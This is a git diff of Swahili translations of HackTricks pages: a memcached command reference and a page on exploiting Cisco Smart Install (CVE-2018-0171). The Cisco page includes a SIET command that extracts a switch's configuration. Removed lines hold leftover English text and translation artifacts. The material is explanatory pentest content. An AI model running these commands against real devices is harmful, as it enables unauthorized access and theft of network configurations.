* [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi)
|
||||
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,58 +2,63 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
## Orodha ya Amri za Haraka
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Mwongozo wa Amri
|
||||
|
||||
**Kutoka** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)
|
||||
|
||||
Amri zinazoungwa mkono (zile rasmi na zingine zisizo rasmi) zimeandikwa katika hati ya [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt).
|
||||
Amri zilizoungwa mkono (zile rasmi na zingine zisizo rasmi) zimeelezewa katika hati ya [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt).
|
||||
|
||||
Kwa bahati mbaya, maelezo ya sintaksia sio wazi sana na amri rahisi ya msaada inayoorodhesha amri zilizopo ingekuwa bora zaidi. Hapa kuna muhtasari wa amri unazoweza kupata kwenye [chanzo](https://github.com/memcached/memcached) (kufikia 19.08.2016):
|
||||
Kwa bahati mbaya maelezo ya sintaksia sio wazi sana na amri rahisi ya msaada inayoonyesha amri zilizopo ingekuwa bora zaidi. Hapa kuna muhtasari wa amri unazoweza kupata katika [chanzo](https://github.com/memcached/memcached) (kufikia 19.08.2016):
|
||||
|
||||
| Amri | Maelezo | Mfano |
|
||||
| Amri | Maelezo | Mfano |
|
||||
| --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| get | Soma thamani | `get mykey` |
|
||||
| set | Weka ufunguo bila masharti | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Hakikisha kutumia \r\n kama mabadiliko ya mstari unapotumia zana za Unix CLI. Kwa mfano</p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
|
||||
| add | Ongeza ufunguo mpya | `add newkey 0 60 5` |
|
||||
| replace | Badilisha ufunguo uliopo | `replace key 0 60 5` |
|
||||
| append | Ongeza data kwenye ufunguo uliopo | `append key 0 60 15` |
|
||||
| prepend | Ongeza data kabla ya ufunguo uliopo | `prepend key 0 60 15` |
|
||||
| incr | Ongeza thamani ya ufunguo wa nambari kwa idadi iliyopewa | `incr mykey 2` |
|
||||
| decr | Punguza thamani ya ufunguo wa nambari kwa idadi iliyopewa | `decr mykey 5` |
|
||||
| delete | Futa ufunguo uliopo | `delete mykey` |
|
||||
| flush\_all | Batilisha vitu vyote mara moja | `flush_all` |
|
||||
| flush\_all | Batilisha vitu vyote baada ya n sekunde | `flush_all 900` |
|
||||
| stats | Chapisha takwimu za jumla | `stats` |
|
||||
| | Chapisha takwimu za kumbukumbu | `stats slabs` |
|
||||
| | Chapisha takwimu za ugawaji wa kiwango cha juu | `stats malloc` |
|
||||
| | Chapisha habari kuhusu vitu | `stats items` |
|
||||
| get | Soma thamani | `get mykey` |
|
||||
| set | Weka funguo bila masharti | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Hakikisha kutumia \r\n kama viambishi vya mistari unapotumia zana za Unix CLI. Kwa mfano</p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
|
||||
| add | Ongeza funguo mpya | `add newkey 0 60 5` |
|
||||
| replace | Badilisha funguo lililopo | `replace key 0 60 5` |
|
||||
| append | Ongeza data kwa funguo lililopo | `append key 0 60 15` |
|
||||
| prepend | Weka data mbele ya funguo lililopo | `prepend key 0 60 15` |
|
||||
| incr | Ongeza thamani ya funguo kwa idadi iliyopewa | `incr mykey 2` |
|
||||
| decr | Punguza thamani ya funguo kwa idadi iliyopewa | `decr mykey 5` |
|
||||
| delete | Futa funguo lililopo | `delete mykey` |
|
||||
| flush\_all | Batilisha vitu vyote mara moja | `flush_all` |
|
||||
| flush\_all | Batilisha vitu vyote baada ya sekunde n | `flush_all 900` |
|
||||
| stats | Chapisha takwimu za jumla | `stats` |
|
||||
| | Chapisha takwimu za kumbukumbu | `stats slabs` |
|
||||
| | Chapisha takwimu za ugawaji wa kiwango cha juu | `stats malloc` |
|
||||
| | Chapisha habari kuhusu vitu | `stats items` |
|
||||
| | | `stats detail` |
|
||||
| | | `stats sizes` |
|
||||
| | Rudisha vipimo vya takwimu | `stats reset` |
|
||||
| lru\_crawler metadump | Pindua (karibu) metadata ya (vitu vyote) kwenye hifadhi | `lru_crawler metadump all` |
|
||||
| version | Chapisha toleo la seva. | `version` |
|
||||
| verbosity | Ongeza kiwango cha kuingiza kwenye kumbukumbu | `verbosity` |
|
||||
| quit | Kamilisha kikao | `quit` |
|
||||
| | Rejesha vipimo vya takwimu | `stats reset` |
|
||||
| lru\_crawler metadump | Pindua (karibu) metadata kwa (vitu vyote) kwenye hifadhi | `lru_crawler metadump all` |
|
||||
| version | Chapisha toleo la seva. | `version` |
|
||||
| verbosity | Ongeza kiwango cha kuingia | `verbosity` |
|
||||
| quit | Komesha kikao | `quit` |
|
||||
|
||||
#### Takwimu za Trafiki <a href="#takwimu-za-trafiki" id="takwimu-za-trafiki"></a>
|
||||
#### Takwimu za Trafiki <a href="#traffic-statistics" id="traffic-statistics"></a>
|
||||
|
||||
Unaweza kuuliza takwimu za trafiki za sasa kwa kutumia amri
|
||||
```
|
||||
stats
|
||||
```
|
||||
Utapata orodha ambayo inahudumia idadi ya uunganisho, herufi zinazoingia/zingine na mengi zaidi.
|
||||
Utapata orodha ambayo inahudumia idadi ya uunganisho, herufi zinazoingia/ kutoka na mengi zaidi.
|
||||
|
||||
Mfano wa Matokeo:
|
||||
```
|
||||
|
@ -81,100 +86,11 @@ STAT limit_maxbytes 52428800
|
|||
STAT threads 1
|
||||
END
|
||||
```
|
||||
#### Takwimu za Kumbukumbu <a href="#takwimu-za-kumbukumbu" id="takwimu-za-kumbukumbu"></a>
|
||||
|
||||
Unaweza kuuliza takwimu za sasa za kumbukumbu kwa kutumia
|
||||
#### Takwimu za Kumbukumbu <a href="#memory-statistics" id="memory-statistics"></a>
|
||||
```
|
||||
stats slabs
|
||||
```
|
||||
# Memcache Commands
|
||||
|
||||
Memcache is an in-memory key-value store that is commonly used for caching data in web applications. It is a popular choice due to its simplicity and high performance. In this section, we will explore some of the most commonly used commands in Memcache.
|
||||
|
||||
## SET
|
||||
|
||||
The `SET` command is used to store a key-value pair in Memcache. It takes the following syntax:
|
||||
|
||||
```
|
||||
SET <key> <flags> <exptime> <bytes> [noreply]\r\n
|
||||
<data block>\r\n
|
||||
```
|
||||
|
||||
- `<key>`: The key under which the data will be stored.
|
||||
- `<flags>`: Optional flags that can be used to store additional metadata about the value.
|
||||
- `<exptime>`: The expiration time for the key-value pair, in seconds.
|
||||
- `<bytes>`: The number of bytes in the data block.
|
||||
- `[noreply]`: An optional parameter that tells the server not to send a response.
|
||||
|
||||
## GET
|
||||
|
||||
The `GET` command is used to retrieve the value associated with a given key. It takes the following syntax:
|
||||
|
||||
```
|
||||
GET <key>\r\n
|
||||
```
|
||||
|
||||
- `<key>`: The key of the value to retrieve.
|
||||
|
||||
## DELETE
|
||||
|
||||
The `DELETE` command is used to remove a key-value pair from Memcache. It takes the following syntax:
|
||||
|
||||
```
|
||||
DELETE <key> [noreply]\r\n
|
||||
```
|
||||
|
||||
- `<key>`: The key of the value to delete.
|
||||
- `[noreply]`: An optional parameter that tells the server not to send a response.
|
||||
|
||||
## INCR and DECR
|
||||
|
||||
The `INCR` and `DECR` commands are used to increment and decrement the value associated with a given key, respectively. They take the following syntax:
|
||||
|
||||
```
|
||||
INCR <key> <value> [noreply]\r\n
|
||||
DECR <key> <value> [noreply]\r\n
|
||||
```
|
||||
|
||||
- `<key>`: The key of the value to increment or decrement.
|
||||
- `<value>`: The amount by which to increment or decrement the value.
|
||||
- `[noreply]`: An optional parameter that tells the server not to send a response.
|
||||
|
||||
## APPEND and PREPEND
|
||||
|
||||
The `APPEND` and `PREPEND` commands are used to append or prepend data to the value associated with a given key, respectively. They take the following syntax:
|
||||
|
||||
```
|
||||
APPEND <key> <bytes> [noreply]\r\n
|
||||
<data block>\r\n
|
||||
PREPEND <key> <bytes> [noreply]\r\n
|
||||
<data block>\r\n
|
||||
```
|
||||
|
||||
- `<key>`: The key of the value to append or prepend data to.
|
||||
- `<bytes>`: The number of bytes in the data block.
|
||||
- `[noreply]`: An optional parameter that tells the server not to send a response.
|
||||
- `<data block>`: The data to append or prepend.
|
||||
|
||||
## STATS
|
||||
|
||||
The `STATS` command is used to retrieve statistics about the Memcache server. It takes the following syntax:
|
||||
|
||||
```
|
||||
STATS\r\n
|
||||
```
|
||||
|
||||
## FLUSH_ALL
|
||||
|
||||
The `FLUSH_ALL` command is used to remove all key-value pairs from Memcache. It takes the following syntax:
|
||||
|
||||
```
|
||||
FLUSH_ALL [noreply]\r\n
|
||||
```
|
||||
|
||||
- `[noreply]`: An optional parameter that tells the server not to send a response.
|
||||
|
||||
These are just a few of the many commands available in Memcache. Understanding these commands is essential for effectively working with Memcache in web applications.
|
||||
Mfano wa Matokeo:
|
||||
```
|
||||
STAT 1:chunk_size 80
|
||||
STAT 1:chunks_per_page 13107
|
||||
|
@ -195,27 +111,19 @@ STAT active_slabs 3
|
|||
STAT total_malloced 3145436
|
||||
END
|
||||
```
|
||||
Ikiwa hauko hakika ikiwa una kumbukumbu ya kutosha kwa kifaa chako cha memcached, angalia mara kwa mara kwa idadi ya "evictions" inayotolewa na amri ya "stats". Ikiwa una kumbukumbu ya kutosha kwa kifaa hicho, idadi ya "evictions" inapaswa kuwa 0 au angalau isiongezeke.
|
||||
Ikiwa haujathibitisha ikiwa una kumbukumbu za kutosha kwa kipengee chako cha memcached, angalia mara kwa mara viashiria vya "evictions" vinavyotolewa na amri ya "stats". Ikiwa una kumbukumbu za kutosha kwa kipengee hicho, kiashiria cha "evictions" kinapaswa kuwa 0 au angalau kisiongezeke.
|
||||
|
||||
#### Ni Funguo Gani Zinazotumiwa? <a href="#funguo-gani-zinazotumiwa" id="funguo-gani-zinazotumiwa"></a>
|
||||
#### Ni Funguo Gani Zinazotumiwa? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
|
||||
|
||||
Hakuna kazi iliyojengwa ndani ya kujua moja kwa moja seti ya sasa ya funguo. Walakini, unaweza kutumia
|
||||
Hakuna kazi iliyojengwa kwa moja kwa moja kubaini seti ya sasa ya funguo. Walakini, unaweza kutumia
|
||||
```
|
||||
stats items
|
||||
```
|
||||
**Swahili Translation:**
|
||||
|
||||
```
|
||||
### Amri ya Kujua Idadi ya Maneno yaliyopo
|
||||
|
||||
Ili kujua idadi ya maneno yaliyopo, tumia amri ifuatayo:
|
||||
### Command to determine how many keys do exist
|
||||
|
||||
```bash
|
||||
stats items
|
||||
```
|
||||
|
||||
Amri hii itakupa habari kuhusu vitu vyote vilivyopo katika kumbukumbu ya Memcache, pamoja na idadi ya maneno yaliyohifadhiwa.
|
||||
```
|
||||
```
|
||||
stats items
|
||||
STAT items:1:number 220
|
||||
|
@ -225,18 +133,23 @@ STAT items:2:age 1405
|
|||
[...]
|
||||
END
|
||||
```
|
||||
Hii angalau inasaidia kuona ikiwa funguo zozote zinatumika. Ili kudump funguo kutoka kwenye script ya PHP ambayo tayari inafikia memcache unaweza kutumia kificho cha PHP kutoka [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html).
|
||||
Hii angalau husaidia kuona ikiwa funguo zozote zimetumika. Ili kudump funguo kutoka kwenye script ya PHP ambayo tayari inatumia ufikivu wa memcache unaweza kutumia msimbo wa PHP kutoka [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html).
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,19 +2,24 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## Taarifa Msingi
|
||||
|
||||
**Cisco Smart Install** ni Cisco iliyoundwa kiotomatiki kwa usanidi wa awali na kupakia picha ya mfumo wa uendeshaji kwa vifaa vipya vya Cisco. **Kwa chaguo-msingi, Cisco Smart Install iko hai kwenye vifaa vya Cisco na hutumia itifaki ya safirishaji, TCP, na nambari ya bandari 4786.**
|
||||
**Cisco Smart Install** ni programu iliyoundwa na Cisco kiotomatiki usanidi wa awali na kupakia picha ya mfumo wa uendeshaji kwa vifaa vipya vya Cisco. **Kwa chaguo-msingi, Cisco Smart Install iko hai kwenye vifaa vya Cisco na hutumia itifaki ya safu ya usafirishaji, TCP, na nambari ya bandari 4786.**
|
||||
|
||||
**Bandari ya chaguo-msingi:** 4786
|
||||
```
|
||||
|
@ -23,19 +28,19 @@ PORT STATE SERVICE
|
|||
```
|
||||
## **Chombo cha Kutumia Utekaji wa Smart Install**
|
||||
|
||||
**Mwaka wa 2018, udhaifu muhimu, CVE-2018–0171, uligunduliwa katika itifaki hii. Kiwango cha tishio ni 9.8 kwenye kiwango cha CVSS.**
|
||||
**Mwaka wa 2018, kasoro muhimu, CVE-2018–0171, iligunduliwa katika itifaki hii. Kiwango cha tishio ni 9.8 kwenye kiwango cha CVSS.**
|
||||
|
||||
**Kifurushi kilichoundwa kwa umakini na kutumwa kwa bandari ya TCP/4786, ambapo Cisco Smart Install inafanya kazi, husababisha kujaa kwa upeo wa buffer, kuruhusu mshambuliaji:**
|
||||
**Pakiti iliyoundwa maalum iliyotumwa kwa bandari ya TCP/4786, ambapo Cisco Smart Install inaendeshwa, inachochea kujaa kwa kijazo cha uwezo, ikiruhusu mshambuliaji:**
|
||||
|
||||
* kuzilazimisha upya vifaa
|
||||
* kuzima kifaa kwa nguvu
|
||||
* kuita RCE
|
||||
* kuiba mipangilio ya vifaa vya mtandao.
|
||||
|
||||
**[**SIET**](https://github.com/frostbits-security/SIET) **(Chombo cha Kutumia Utekaji wa Smart Install)** kilibuniwa kutumia udhaifu huu, kinakuruhusu kutumia Cisco Smart Install. Katika makala hii nitakuonyesha jinsi unavyoweza kusoma faili halali ya mipangilio ya vifaa vya mtandao. Kuweka mazingira ya kufichua inaweza kuwa muhimu kwa mpimaji kwani atajifunza kuhusu sifa za kipekee za mtandao. Na hii itafanya maisha kuwa rahisi na kuruhusu kupata njia mpya za mashambulizi.
|
||||
**[**SIET**](https://github.com/frostbits-security/SIET) **(Chombo cha Kutumia Utekaji wa Smart Install)** kilibuniwa kutumia kasoro hii, kinakuruhusu kutumia Cisco Smart Install. Katika makala hii nitakuonyesha jinsi unavyoweza kusoma faili halali ya mipangilio ya vifaa vya mtandao. Kuweka mazingira ya kufichua inaweza kuwa muhimu kwa mtu anayefanya majaribio ya udukuzi kwa sababu itamjulisha kuhusu sifa za pekee za mtandao. Na hii itafanya maisha kuwa rahisi na kuruhusu kupata njia mpya za mashambulizi.
|
||||
|
||||
**Kifaa cha lengo kitakuwa "hai" Cisco Catalyst 2960 switch. Picha za kisasa hazina Cisco Smart Install, hivyo unaweza kufanya mazoezi kwenye vifaa halisi tu.**
|
||||
**Kifaa cha lengo kitakuwa "live" Cisco Catalyst 2960 switch. Picha za kisasa hazina Cisco Smart Install, hivyo unaweza kufanya mazoezi kwenye vifaa halisi tu.**
|
||||
|
||||
Anwani ya switch ya lengo ni **10.10.100.10 na CSI inafanya kazi.** Pakia SIET na anzisha shambulio. **Hoja ya -g** inamaanisha kufichua mipangilio kutoka kwa kifaa, **hoja ya -i** inakuruhusu kuweka anwani ya IP ya lengo lenye udhaifu.
|
||||
Anwani ya switch ya lengo ni **10.10.100.10 na CSI inaendeshwa.** Pakia SIET na anzisha shambulio. **Hoja ya -g** inamaanisha kufichua mipangilio kutoka kwenye kifaa, **hoja ya -i** inakuruhusu kuweka anwani ya IP ya lengo lenye kasoro.
|
||||
```
|
||||
~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
|
||||
```
|
||||
|
@ -45,14 +50,19 @@ Mipangilio ya switch **10.10.100.10** itakuwa katika folda ya **tftp/**
|
|||
|
||||
<figure><img src="../.gitbook/assets/image (1113).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Je, unafanya kazi katika kampuni ya **usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,20 +4,24 @@
|
|||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
